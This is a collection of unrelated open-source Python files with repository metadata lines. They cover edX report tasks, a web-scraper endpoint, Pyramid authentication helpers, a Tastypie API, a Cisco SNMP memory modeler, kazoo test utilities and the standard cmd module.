'Country': _('Country'),
'Enrollment Date': _('Enrollment Date'),
'Currently Enrolled': _('Currently Enrolled'),
'Enrollment Source': _('Enrollment Source'),
'Enrollment Role': _('Enrollment Role'),
'List Price': _('List Price'),
'Payment Amount': _('Payment Amount'),
'Coupon Codes Used': _('Coupon Codes Used'),
'Registration Code Used': _('Registration Code Used'),
'Payment Status': _('Payment Status'),
'Transaction Reference Number': _('Transaction Reference Number')
}
if not header:
header = user_data.keys() + course_enrollment_data.keys() + payment_data.keys()
display_headers = []
for header_element in header:
# translate header into a localizable display string
display_headers.append(enrollment_report_headers.get(header_element, header_element))
rows.append(display_headers)
rows.append(user_data.values() + course_enrollment_data.values() + payment_data.values())
task_progress.succeeded += 1
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, Detailed enrollment report generated for students: %s/%s',
task_info_string,
action_name,
current_step,
student_counter,
total_students
)
# By this point, we've got the rows we're going to stuff into our CSV files.
current_step = {'step': 'Uploading CSVs'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_csv_to_report_store(rows, 'enrollment_report', course_id, start_date, config_name='FINANCIAL_REPORTS')
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing detailed enrollment task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def upload_may_enroll_csv(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
For a given `course_id`, generate a CSV file containing
information about students who may enroll but have not done so
yet, and store using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
num_reports = 1
task_progress = TaskProgress(action_name, num_reports, start_time)
current_step = {'step': 'Calculating info about students who may enroll'}
task_progress.update_task_state(extra_meta=current_step)
# Compute result table and format it
query_features = task_input.get('features')
student_data = list_may_enroll(course_id, query_features)
header, rows = format_dictlist(student_data, query_features)
task_progress.attempted = task_progress.succeeded = len(rows)
task_progress.skipped = task_progress.total - task_progress.attempted
rows.insert(0, header)
current_step = {'step': 'Uploading CSV'}
task_progress.update_task_state(extra_meta=current_step)
# Perform the upload
upload_csv_to_report_store(rows, 'may_enroll_info', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def get_executive_report(course_id):
"""
Returns dict containing information about the course executive summary.
"""
single_purchase_total = PaidCourseRegistration.get_total_amount_of_purchased_item(course_id)
bulk_purchase_total = CourseRegCodeItem.get_total_amount_of_purchased_item(course_id)
paid_invoices_total = InvoiceTransaction.get_total_amount_of_paid_course_invoices(course_id)
gross_paid_revenue = single_purchase_total + bulk_purchase_total + paid_invoices_total
all_invoices_total = Invoice.get_invoice_total_amount_for_course(course_id)
gross_pending_revenue = all_invoices_total - float(paid_invoices_total)
gross_revenue = float(gross_paid_revenue) + float(gross_pending_revenue)
refunded_self_purchased_seats = PaidCourseRegistration.get_self_purchased_seat_count(
course_id, status='refunded'
)
refunded_bulk_purchased_seats = CourseRegCodeItem.get_bulk_purchased_seat_count(
course_id, status='refunded'
)
total_seats_refunded = refunded_self_purchased_seats + refunded_bulk_purchased_seats
self_purchased_refunds = PaidCourseRegistration.get_total_amount_of_purchased_item(
course_id,
status='refunded'
)
bulk_purchase_refunds = CourseRegCodeItem.get_total_amount_of_purchased_item(course_id, status='refunded')
total_amount_refunded = self_purchased_refunds + bulk_purchase_refunds
top_discounted_codes = CouponRedemption.get_top_discount_codes_used(course_id)
total_coupon_codes_purchases = CouponRedemption.get_total_coupon_code_purchases(course_id)
bulk_purchased_codes = CourseRegistrationCode.order_generated_registration_codes(course_id)
unused_registration_codes = 0
for registration_code in bulk_purchased_codes:
if not RegistrationCodeRedemption.is_registration_code_redeemed(registration_code.code):
unused_registration_codes += 1
self_purchased_seat_count = PaidCourseRegistration.get_self_purchased_seat_count(course_id)
bulk_purchased_seat_count = CourseRegCodeItem.get_bulk_purchased_seat_count(course_id)
total_invoiced_seats = CourseRegistrationCode.invoice_generated_registration_codes(course_id).count()
total_seats = self_purchased_seat_count + bulk_purchased_seat_count + total_invoiced_seats
self_purchases_percentage = 0.0
bulk_purchases_percentage = 0.0
invoice_purchases_percentage = 0.0
avg_price_paid = 0.0
if total_seats != 0:
self_purchases_percentage = (float(self_purchased_seat_count) / float(total_seats)) * 100
bulk_purchases_percentage = (float(bulk_purchased_seat_count) / float(total_seats)) * 100
invoice_purchases_percentage = (float(total_invoiced_seats) / float(total_seats)) * 100
avg_price_paid = gross_revenue / total_seats
course = get_course_by_id(course_id, depth=0)
currency = settings.PAID_COURSE_REGISTRATION_CURRENCY[1]
return {
'display_name': course.display_name,
'start_date': course.start.strftime("%Y-%m-%d") if course.start is not None else 'N/A',
'end_date': course.end.strftime("%Y-%m-%d") if course.end is not None else 'N/A',
'total_seats': total_seats,
'currency': currency,
'gross_revenue': float(gross_revenue),
'gross_paid_revenue': float(gross_paid_revenue),
'gross_pending_revenue': gross_pending_revenue,
'total_seats_refunded': total_seats_refunded,
'total_amount_refunded': float(total_amount_refunded),
'average_paid_price': float(avg_price_paid),
'discount_codes_data': top_discounted_codes,
'total_seats_using_discount_codes': total_coupon_codes_purchases,
'total_self_purchase_seats': self_purchased_seat_count,
'total_bulk_purchase_seats': bulk_purchased_seat_count,
'total_invoiced_seats': total_invoiced_seats,
'unused_bulk_purchase_code_count': unused_registration_codes,
'self_purchases_percentage': self_purchases_percentage,
'bulk_purchases_percentage': bulk_purchases_percentage,
'invoice_purchases_percentage': invoice_purchases_percentage,
}
def upload_exec_summary_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name): # pylint: disable=too-many-statements
"""
For a given `course_id`, generate a html report containing information,
which provides a snapshot of how the course is doing.
"""
start_time = time()
report_generation_date = datetime.now(UTC)
status_interval = 100
enrolled_users = CourseEnrollment.objects.users_enrolled_in(course_id)
true_enrollment_count = 0
for user in enrolled_users:
if not user.is_staff and not CourseAccessRole.objects.filter(
user=user, course_id=course_id, role__in=FILTERED_OUT_ROLES
).exists():
true_enrollment_count += 1
task_progress = TaskProgress(action_name, true_enrollment_count, start_time)
fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
task_info_string = fmt.format(
task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
entry_id=_entry_id,
course_id=course_id,
task_input=_task_input
)
TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
current_step = {'step': 'Gathering executive summary report information'}
TASK_LOG.info(
u'%s, Task type: %s, Current step: %s, generating executive summary report',
task_info_string,
action_name,
current_step
)
if task_progress.attempted % status_interval == 0:
task_progress.update_task_state(extra_meta=current_step)
task_progress.attempted += 1
# get the course executive summary report information.
data_dict = get_executive_report(course_id)
data_dict.update(
{
'total_enrollments': true_enrollment_count,
'report_generation_date': report_generation_date.strftime("%Y-%m-%d"),
}
)
# By this point, we've got the data that we need to generate html report.
current_step = {'step': 'Uploading executive summary report HTML file'}
task_progress.update_task_state(extra_meta=current_step)
TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
# Perform the actual upload
upload_exec_summary_to_store(data_dict, 'executive_report', course_id, report_generation_date)
task_progress.succeeded += 1
# One last update before we close out...
TASK_LOG.info(u'%s, Task type: %s, Finalizing executive summary report task', task_info_string, action_name)
return task_progress.update_task_state(extra_meta=current_step)
def generate_students_certificates(
_xmodule_instance_args, _entry_id, course_id, task_input, action_name): # pylint: disable=unused-argument
"""
For a given `course_id`, generate certificates for all students
that are enrolled.
"""
start_time = time()
enrolled_students = use_read_replica_if_available(CourseEnrollment.objects.users_enrolled_in(course_id))
task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
current_step = {'step': 'Calculating students already have certificates'}
task_progress.update_task_state(extra_meta=current_step)
students_require_certs = students_require_certificate(course_id, enrolled_students)
task_progress.skipped = task_progress.total - len(students_require_certs)
current_step = {'step': 'Generating Certificates'}
task_progress.update_task_state(extra_meta=current_step)
course = modulestore().get_course(course_id, depth=0)
# Generate certificate for each student
for student in students_require_certs:
task_progress.attempted += 1
status = generate_user_certificates(
student,
course_id,
course=course
)
if status in [CertificateStatuses.generating, CertificateStatuses.downloadable]:
task_progress.succeeded += 1
else:
task_progress.failed += 1
return task_progress.update_task_state(extra_meta=current_step)
def cohort_students_and_upload(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
"""
Within a given course, cohort students in bulk, then upload the results
using a `ReportStore`.
"""
start_time = time()
start_date = datetime.now(UTC)
# Iterate through rows to get total assignments for task progress
with DefaultStorage().open(task_input['file_name']) as f:
total_assignments = 0
for _line in unicodecsv.DictReader(UniversalNewlineIterator(f)):
total_assignments += 1
task_progress = TaskProgress(action_name, total_assignments, start_time)
current_step = {'step': 'Cohorting Students'}
task_progress.update_task_state(extra_meta=current_step)
# cohorts_status is a mapping from cohort_name to metadata about
# that cohort. The metadata will include information about users
# successfully added to the cohort, users not found, and a cached
# reference to the corresponding cohort object to prevent
# redundant cohort queries.
cohorts_status = {}
with DefaultStorage().open(task_input['file_name']) as f:
for row in unicodecsv.DictReader(UniversalNewlineIterator(f), encoding='utf-8'):
# Try to use the 'email' field to identify the user. If it's not present, use 'username'.
username_or_email = row.get('email') or row.get('username')
cohort_name = row.get('cohort') or ''
task_progress.attempted += 1
if not cohorts_status.get(cohort_name):
cohorts_status[cohort_name] = {
'Cohort Name': cohort_name,
'Students Added': 0,
'Students Not Found': set()
}
try:
cohorts_status[cohort_name]['cohort'] = CourseUserGroup.objects.get(
course_id=course_id,
group_type=CourseUserGroup.COHORT,
name=cohort_name
)
cohorts_status[cohort_name]["Exists"] = True
except CourseUserGroup.DoesNotExist:
cohorts_status[cohort_name]["Exists"] = False
if not cohorts_status[cohort_name]['Exists']:
task_progress.failed += 1
continue
try:
with transaction.commit_on_success():
add_user_to_cohort(cohorts_status[cohort_name]['cohort'], username_or_email)
cohorts_status[cohort_name]['Students Added'] += 1
task_progress.succeeded += 1
except User.DoesNotExist:
cohorts_status[cohort_name]['Students Not Found'].add(username_or_email)
task_progress.failed += 1
except ValueError:
# Raised when the user is already in the given cohort
task_progress.skipped += 1
task_progress.update_task_state(extra_meta=current_step)
current_step['step'] = 'Uploading CSV'
task_progress.update_task_state(extra_meta=current_step)
# Filter the output of `add_users_to_cohorts` in order to upload the result.
output_header = ['Cohort Name', 'Exists', 'Students Added', 'Students Not Found']
output_rows = [
[
','.join(status_dict.get(column_name, '')) if column_name == 'Students Not Found'
else status_dict[column_name]
for column_name in output_header
]
for _cohort_name, status_dict in cohorts_status.iteritems()
]
output_rows.insert(0, output_header)
upload_csv_to_report_store(output_rows, 'cohort_results', course_id, start_date)
return task_progress.update_task_state(extra_meta=current_step)
def students_require_certificate(course_id, enrolled_students):
""" Returns list of students where certificates needs to be generated.
Removing those students who have their certificate already generated
from total enrolled students for given course.
:param course_id:
:param enrolled_students:
"""
# compute those students where certificates already generated
students_already_have_certs = use_read_replica_if_available(User.objects.filter(
~Q(generatedcertificate__status=CertificateStatuses.unavailable),
generatedcertificate__course_id=course_id))
return list(set(enrolled_students) - set(students_already_have_certs))
| edcast-inc/edx-platform-edcast | lms/djangoapps/instructor_task/tasks_helper.py | Python | agpl-3.0 | 64,173 |
#!/usr/bin/python
from lxml import html
import requests
INIT_FIELDS = [ 'endpoint_url', \
'resource_url', \
'xpath' ]
'''
Encapsulates an endpoint to RESTful api service
'''
class Endpoint(object):
def __init__(self, params):
for field in INIT_FIELDS:
if field not in params:
raise EndpointException('\'%s\' is a required field.' % field)
self._params = params
self._params['endpoint_url'] = self.valid_url(self._params['endpoint_url'])
def do_get(self):
return self.scrape(self._params['resource_url'], \
self._params['xpath'])
def scrape(self, resource_url, xpath):
page = requests.get(resource_url)
tree = html.fromstring(page.text)
return tree.xpath(xpath)
def url(self):
return self._params['endpoint_url']
def valid_url(self, endpoint_url):
if not endpoint_url.startswith('/'):
endpoint_url = '/' + endpoint_url
if not endpoint_url.endswith('/'):
endpoint_url += '/'
return endpoint_url
class EndpointException(Exception):
pass
| alextbok/deployable-scraper-api | src/endpoint.py | Python | apache-2.0 | 1,013 |
import marketing_campaign_activity | smartforceplus/SmartForceplus | .local/share/Odoo/addons/8.0/entity_sms_campaign/__init__.py | Python | agpl-3.0 | 34 |
from typing import (
Any,
Callable,
ClassVar,
Generic,
List,
Optional,
Sequence,
Tuple,
TypeVar,
)
import typing_extensions
TimedFunction = Callable[..., Any]
class MultiTimerObject(typing_extensions.Protocol):
functions: List[TimedFunction]
def repeat(
self, domain: Sequence[Any], repeat: int, number: int, *args: Any, **kwargs: Any
) -> List[List[List[int]]]:
...
def timeit(
self, domain: Sequence[Any], number: int, *args: Any, **kwargs: Any
) -> List[List[int]]:
...
def autorange(
self, domain: Sequence[Any], *args: Any, **kwargs: Any
) -> List[List[int]]:
...
class FunctionTimerObject(typing_extensions.Protocol):
multi_timer: ClassVar[MultiTimerObject]
TIn = TypeVar("TIn", contravariant=True)
TOut = TypeVar("TOut")
class Graph(typing_extensions.Protocol, Generic[TIn, TOut]):
def graph(
self,
graph: TIn,
values: List[float],
errors: List[float],
domain: List[Any],
*,
functions: Optional[List[TimedFunction]] = None,
colors: Tuple[str, ...] = (),
title: Optional[str] = None,
legend: bool = True,
error: bool = True
) -> List[TOut]:
...
| Peilonrayz/graphtimer | src/graphtimer/types.py | Python | mit | 1,284 |
import base64
import os
from passlib.context import CryptContext
from pyramid.authentication import (
BasicAuthAuthenticationPolicy as _BasicAuthAuthenticationPolicy,
)
from pyramid.path import (
DottedNameResolver,
caller_package,
)
from contentbase import ROOT
CRYPT_CONTEXT = __name__ + ':crypt_context'
def includeme(config):
config.include('.edw_hash')
setting_prefix = 'passlib.'
passlib_settings = {
k[len(setting_prefix):]: v
for k, v in config.registry.settings.items()
if k.startswith(setting_prefix)
}
if not passlib_settings:
passlib_settings = {'schemes': 'edw_hash, unix_disabled'}
crypt_context = CryptContext(**passlib_settings)
config.registry[CRYPT_CONTEXT] = crypt_context
class NamespacedAuthenticationPolicy(object):
""" Wrapper for authentication policy classes
As userids are included in the list of principals, it seems good practice
to namespace them to avoid clashes.
Constructor Arguments
``namespace``
The namespace used (string).
``base``
The base authentication policy (class or dotted name).
Remaining arguments are passed to the ``base`` constructor.
Example
To make a ``REMOTE_USER`` 'admin' be 'user.admin'
.. code-block:: python
policy = NamespacedAuthenticationPolicy('user',
'pyramid.authentication.RemoteUserAuthenticationPolicy')
"""
def __new__(cls, namespace, base, *args, **kw):
# Dotted name support makes it easy to configure with pyramid_multiauth
name_resolver = DottedNameResolver(caller_package())
base = name_resolver.maybe_resolve(base)
# Dynamically create a subclass
name = 'Namespaced_%s_%s' % (namespace, base.__name__)
klass = type(name, (cls, base), {'_namespace_prefix': namespace + '.'})
return super(NamespacedAuthenticationPolicy, klass).__new__(klass)
def __init__(self, namespace, base, *args, **kw):
super(NamespacedAuthenticationPolicy, self).__init__(*args, **kw)
def unauthenticated_userid(self, request):
userid = super(NamespacedAuthenticationPolicy, self) \
.unauthenticated_userid(request)
if userid is not None:
userid = self._namespace_prefix + userid
return userid
def remember(self, request, principal, **kw):
if not principal.startswith(self._namespace_prefix):
return []
principal = principal[len(self._namespace_prefix):]
return super(NamespacedAuthenticationPolicy, self) \
.remember(request, principal, **kw)
class BasicAuthAuthenticationPolicy(_BasicAuthAuthenticationPolicy):
def __init__(self, check, *args, **kw):
# Dotted name support makes it easy to configure with pyramid_multiauth
name_resolver = DottedNameResolver(caller_package())
check = name_resolver.maybe_resolve(check)
super(BasicAuthAuthenticationPolicy, self).__init__(check, *args, **kw)
def basic_auth_check(username, password, request):
# We may get called before the context is found and the root set
root = request.registry[ROOT]
collection = root['access-keys']
try:
access_key = collection[username]
except KeyError:
return None
properties = access_key.properties
hash = properties['secret_access_key_hash']
crypt_context = request.registry[CRYPT_CONTEXT]
valid = crypt_context.verify(password, hash)
if not valid:
return None
#valid, new_hash = crypt_context.verify_and_update(password, hash)
#if new_hash:
# replace_user_hash(user, new_hash)
return []
def generate_user():
""" Generate a random user name with 64 bits of entropy
"""
# Take a random 5 char binary string (80 bits of
# entropy) and encode it as upper cased base32 (8 chars)
random_bytes = os.urandom(5)
user = base64.b32encode(random_bytes).decode('ascii').rstrip('=').upper()
return user
def generate_password():
""" Generate a password with 80 bits of entropy
"""
# Take a random 10 char binary string (80 bits of
# entropy) and encode it as lower cased base32 (16 chars)
random_bytes = os.urandom(10)
password = base64.b32encode(random_bytes).decode('ascii').rstrip('=').lower()
return password
| kidaa/encoded | src/encoded/authentication.py | Python | mit | 4,355 |
in_python = ''
| snakeleon/YouCompleteMe-x64 | third_party/ycmd/third_party/jedi_deps/jedi/test/completion/stub_folder/with_stub_folder/python_only.py | Python | gpl-3.0 | 15 |
from tastypie import fields
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from teachers.models import Teacher, TeacherClass, Entry
from core.utils import CORSResource
class TeacherResource(CORSResource, ModelResource):
class Meta:
queryset = Teacher.objects.all()
resource_name = 'teacher'
filtering = {
'email': ALL,
'name': ALL,
}
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
class TeacherClassResource(CORSResource, ModelResource):
teacher = fields.ForeignKey(TeacherResource, 'teacher')
class Meta:
queryset = TeacherClass.objects.all()
resource_name = 'teacher_class'
filtering = {
'teacher': ALL_WITH_RELATIONS,
'name': ALL_WITH_RELATIONS,
'course_id': ALL,
}
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
class EntryResource(CORSResource, ModelResource):
teacher = fields.ForeignKey(TeacherResource, 'teacher', full=True)
teacher_class = fields.ForeignKey(TeacherClassResource, 'teacher_class', full=True)
class Meta:
queryset = Entry.objects.all()
resource_name = 'entry'
filtering = {
'teacher': ALL_WITH_RELATIONS,
'teacher_class': ALL_WITH_RELATIONS,
'date': ALL,
'teacher_name': ALL_WITH_RELATIONS
}
list_allowed_methods = ['get']
detail_allowed_methods = ['get']
| trawick/edurepo | src/edurepo/teachers/api.py | Python | apache-2.0 | 1,524 |
__doc__ = """CiscoMemoryPool
models memory pools from a Cisco IOS device
"""
from Products.DataCollector.plugins.CollectorPlugin \
import SnmpPlugin, GetTableMap
from Products.DataCollector.plugins.DataMaps \
import MultiArgs, RelationshipMap, ObjectMap
class CiscoMemoryPool(SnmpPlugin):
maptype = 'MemoryPool'
relname = 'memoryPools'
modname = 'ZenPacks.daviswr.Cisco.IOS.Memory.MemoryPool'
ciscoMemoryPoolEntry = {
# ciscoMemoryPoolName
'.2': 'title',
# ciscoMemoryPoolAlternate
'.3': 'alt_idx',
# ciscoMemoryPoolValid
'.4': 'valid',
# ciscoMemoryPoolUsed
'.5': 'used',
# ciscoMemoryPoolFree
'.6': 'free',
}
snmpGetTableMaps = (
GetTableMap(
'ciscoMemoryPoolTable',
'.1.3.6.1.4.1.9.9.48.1.1.1',
ciscoMemoryPoolEntry
),
)
def condition(self, device, log):
"""determine if this modeler should run"""
# CISCO-SMI::ciscoProducts
if not device.snmpOid.startswith('.1.3.6.1.4.1.9.1'):
log.info('%s is not a Cisco IOS device', device.id)
return device.snmpOid.startswith('.1.3.6.1.4.1.9.1')
def process(self, device, results, log):
"""collect snmp information from this device"""
log.info('processing %s for device %s', self.name(), device.id)
maps = list()
getdata, tabledata = results
log.debug('SNMP Tables:\n%s', tabledata)
ciscoMemoryPoolTable = tabledata.get('ciscoMemoryPoolTable')
if ciscoMemoryPoolTable is None:
log.error('Unable to get ciscoMemoryPoolTable for %s', device.id)
else:
log.debug(
'ciscoMemoryPoolTable has %s entries',
len(ciscoMemoryPoolTable)
)
# Memory Pools
rm = self.relMap()
for snmpindex in ciscoMemoryPoolTable:
row = ciscoMemoryPoolTable[snmpindex]
name = row.get('title', None)
if name is None:
continue
elif '' == name or len(name) == 0:
name = 'Memory Pool {0}'.format(snmpindex)
log.debug('%s found memory pool: %s', self.name(), name)
# Find the name of the alternate pool's index if index > 0
alt_row = ciscoMemoryPoolTable.get(str(row['alt_idx']), dict())
row['alternate'] = alt_row.get('title', 'Yes') \
if row.get('alt_idx', 0) > 0 \
else 'None'
if 'valid' in row:
row['valid'] = True if row.get('valid') == 1 else False
row['size'] = row.get('free', 0) + row.get('used', 0)
# Update dictionary and create Object Map
row.update({
'snmpindex': snmpindex.strip('.'),
'id': self.prepId('mempool_{0}'.format(name))
})
rm.append(ObjectMap(
modname='ZenPacks.daviswr.Cisco.IOS.Memory.MemoryPool',
data=row
))
log.debug('%s RelMap:\n%s', self.name(), str(rm))
return rm
| daviswr/ZenPacks.daviswr.Cisco.IOS.Memory | ZenPacks/daviswr/Cisco/IOS/Memory/modeler/plugins/daviswr/snmp/CiscoMemoryPool.py | Python | mit | 3,164 |
##############################################################################
#
# Copyright Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
import logging
import os
import time
TRAVIS = os.environ.get('TRAVIS', False)
TRAVIS_ZK_VERSION = TRAVIS and os.environ.get('ZOOKEEPER_VERSION', None)
if TRAVIS_ZK_VERSION:
if '-' in TRAVIS_ZK_VERSION:
# Ignore pre-release markers like -alpha
TRAVIS_ZK_VERSION = TRAVIS_ZK_VERSION.split('-')[0]
TRAVIS_ZK_VERSION = tuple([int(n) for n in TRAVIS_ZK_VERSION.split('.')])
class Handler(logging.Handler):
def __init__(self, *names, **kw):
logging.Handler.__init__(self)
self.names = names
self.records = []
self.setLoggerLevel(**kw)
def setLoggerLevel(self, level=1):
self.level = level
self.oldlevels = {}
def emit(self, record):
self.records.append(record)
def clear(self):
del self.records[:]
def install(self):
for name in self.names:
logger = logging.getLogger(name)
self.oldlevels[name] = logger.level
logger.setLevel(self.level)
logger.addHandler(self)
def uninstall(self):
for name in self.names:
logger = logging.getLogger(name)
logger.setLevel(self.oldlevels[name])
logger.removeHandler(self)
def __str__(self):
return '\n'.join(
[("%s %s\n %s" %
(record.name, record.levelname,
'\n'.join([line
for line in record.getMessage().split('\n')
if line.strip()])
)
)
for record in self.records])
class InstalledHandler(Handler):
def __init__(self, *names, **kw):
Handler.__init__(self, *names, **kw)
self.install()
class Wait(object):
class TimeOutWaitingFor(Exception):
"A test condition timed out"
timeout = 9
wait = .01
def __init__(self, timeout=None, wait=None, exception=None,
getnow=(lambda: time.time), getsleep=(lambda: time.sleep)):
if timeout is not None:
self.timeout = timeout
if wait is not None:
self.wait = wait
if exception is not None:
self.TimeOutWaitingFor = exception
self.getnow = getnow
self.getsleep = getsleep
def __call__(self, func=None, timeout=None, wait=None, message=None):
if func is None:
return lambda func: self(func, timeout, wait, message)
if func():
return
now = self.getnow()
sleep = self.getsleep()
if timeout is None:
timeout = self.timeout
if wait is None:
wait = self.wait
wait = float(wait)
deadline = now() + timeout
while 1:
sleep(wait)
if func():
return
if now() > deadline:
raise self.TimeOutWaitingFor(
message or
getattr(func, '__doc__') or
getattr(func, '__name__')
)
wait = Wait()
| johankaito/fufuka | microblog/venv/lib/python2.7/site-packages/kazoo/tests/util.py | Python | apache-2.0 | 3,657 |
"""A generic class to build line-oriented command interpreters.
Interpreters constructed with this class obey the following conventions:
1. End of file on input is processed as the command 'EOF'.
2. A command is parsed out of each line by collecting the prefix composed
of characters in the identchars member.
3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method
is passed a single argument consisting of the remainder of the line.
4. Typing an empty line repeats the last command. (Actually, it calls the
method `emptyline', which may be overridden in a subclass.)
5. There is a predefined `help' method. Given an argument `topic', it
calls the command `help_topic'. With no arguments, it lists all topics
with defined help_ functions, broken into up to three topics; documented
commands, miscellaneous help topics, and undocumented commands.
6. The command '?' is a synonym for `help'. The command '!' is a synonym
for `shell', if a do_shell method exists.
7. If completion is enabled, completing commands will be done automatically,
and completing of commands args is done by calling complete_foo() with
arguments text, line, begidx, endidx. text is string we are matching
against, all returned matches must begin with it. line is the current
input line (lstripped), begidx and endidx are the beginning and end
indexes of the text being matched, which could be used to provide
different completion depending upon which position the argument is in.
The `default' method may be overridden to intercept commands for which there
is no do_ method.
The `completedefault' method may be overridden to intercept completions for
commands that have no complete_ method.
The data member `self.ruler' sets the character used to draw separator lines
in the help messages. If empty, no ruler line is drawn. It defaults to "=".
If the value of `self.intro' is nonempty when the cmdloop method is called,
it is printed out on interpreter startup. This value may be overridden
via an optional argument to the cmdloop() method.
The data members `self.doc_header', `self.misc_header', and
`self.undoc_header' set the headers used for the help function's
listings of documented functions, miscellaneous topics, and undocumented
functions respectively.
These interpreters use raw_input; thus, if the readline module is loaded,
they automatically support Emacs-like command history and editing features.
"""
import string, sys
__all__ = ["Cmd"]
PROMPT = '(Cmd) '
IDENTCHARS = string.ascii_letters + string.digits + '_'
class Cmd:
"""A simple framework for writing line-oriented command interpreters.
These are often useful for test harnesses, administrative tools, and
prototypes that will later be wrapped in a more sophisticated interface.
A Cmd instance or subclass instance is a line-oriented interpreter
framework. There is no good reason to instantiate Cmd itself; rather,
it's useful as a superclass of an interpreter class you define yourself
in order to inherit Cmd's methods and encapsulate action methods.
"""
prompt = PROMPT
identchars = IDENTCHARS
ruler = '='
lastcmd = ''
intro = None
doc_leader = ""
doc_header = "Documented commands (type help <topic>):"
misc_header = "Miscellaneous help topics:"
undoc_header = "Undocumented commands:"
nohelp = "*** No help on %s"
use_rawinput = 1
def __init__(self, completekey='tab'):
"""Instantiate a line-oriented interpreter framework.
The optional argument is the readline name of a completion key;
it defaults to the Tab key. If completekey is not None and the
readline module is available, command completion is done
automatically.
"""
self.cmdqueue = []
self.completekey = completekey
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
"""
self.preloop()
if intro is not None:
self.intro = intro
if self.intro:
print self.intro
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue[0]
del self.cmdqueue[0]
else:
if self.use_rawinput:
try:
line = raw_input(self.prompt)
except EOFError:
line = 'EOF'
else:
sys.stdout.write(self.prompt)
sys.stdout.flush()
line = sys.stdin.readline()
if not len(line):
line = 'EOF'
else:
line = line[:-1] # chop \n
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
def precmd(self, line):
"""Hook method executed just before the command line is
interpreted, but after the input prompt is generated and issued.
"""
return line
def postcmd(self, stop, line):
"""Hook method executed just after a command dispatch is finished."""
return stop
def preloop(self):
"""Hook method executed once when the cmdloop() method is called."""
if self.completekey:
try:
import readline
self.old_completer = readline.get_completer()
readline.set_completer(self.complete)
readline.parse_and_bind(self.completekey+": complete")
except ImportError:
pass
def postloop(self):
"""Hook method executed once when the cmdloop() method is about to
return.
"""
if self.completekey:
try:
import readline
readline.set_completer(self.old_completer)
except ImportError:
pass
def parseline(self, line):
line = line.strip()
if not line:
return None, None, line
elif line[0] == '?':
line = 'help ' + line[1:]
elif line[0] == '!':
if hasattr(self, 'do_shell'):
line = 'shell ' + line[1:]
else:
return None, None, line
i, n = 0, len(line)
while i < n and line[i] in self.identchars: i = i+1
cmd, arg = line[:i], line[i:].strip()
return cmd, arg, line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
This may be overridden, but should not normally need to be;
see the precmd() and postcmd() methods for useful execution hooks.
The return value is a flag indicating whether interpretation of
commands by the interpreter should stop.
"""
cmd, arg, line = self.parseline(line)
if not line:
return self.emptyline()
if cmd is None:
return self.default(line)
self.lastcmd = line
if cmd == '':
return self.default(line)
else:
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
return self.default(line)
return func(arg)
def emptyline(self):
"""Called when an empty line is entered in response to the prompt.
If this method is not overridden, it repeats the last nonempty
command entered.
"""
if self.lastcmd:
return self.onecmd(self.lastcmd)
def default(self, line):
"""Called on an input line when the command prefix is not recognized.
If this method is not overridden, it prints an error message and
returns.
"""
print '*** Unknown syntax:', line
def completedefault(self, *ignored):
"""Method called to complete an input line when no command-specific
complete_*() method is available.
By default, it returns an empty list.
"""
return []
def completenames(self, text, *ignored):
dotext = 'do_'+text
return [a[3:] for a in self.get_names() if a.startswith(dotext)]
def complete(self, text, state):
"""Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
if state == 0:
import readline
origline = readline.get_line_buffer()
line = origline.lstrip()
stripped = len(origline) - len(line)
begidx = readline.get_begidx() - stripped
endidx = readline.get_endidx() - stripped
if begidx>0:
cmd, args, foo = self.parseline(line)
if cmd == '':
compfunc = self.completedefault
else:
try:
compfunc = getattr(self, 'complete_' + cmd)
except AttributeError:
compfunc = self.completedefault
else:
compfunc = self.completenames
self.completion_matches = compfunc(text, line, begidx, endidx)
try:
return self.completion_matches[state]
except IndexError:
return None
def get_names(self):
# Inheritance says we have to look in class and
# base classes; order is not important.
names = []
classes = [self.__class__]
while classes:
aclass = classes[0]
if aclass.__bases__:
classes = classes + list(aclass.__bases__)
names = names + dir(aclass)
del classes[0]
return names
def complete_help(self, *args):
return self.completenames(*args)
def do_help(self, arg):
if arg:
# XXX check arg syntax
try:
func = getattr(self, 'help_' + arg)
except:
try:
doc=getattr(self, 'do_' + arg).__doc__
if doc:
print doc
return
except:
pass
print self.nohelp % (arg,)
return
func()
else:
names = self.get_names()
cmds_doc = []
cmds_undoc = []
help = {}
for name in names:
if name[:5] == 'help_':
help[name[5:]]=1
names.sort()
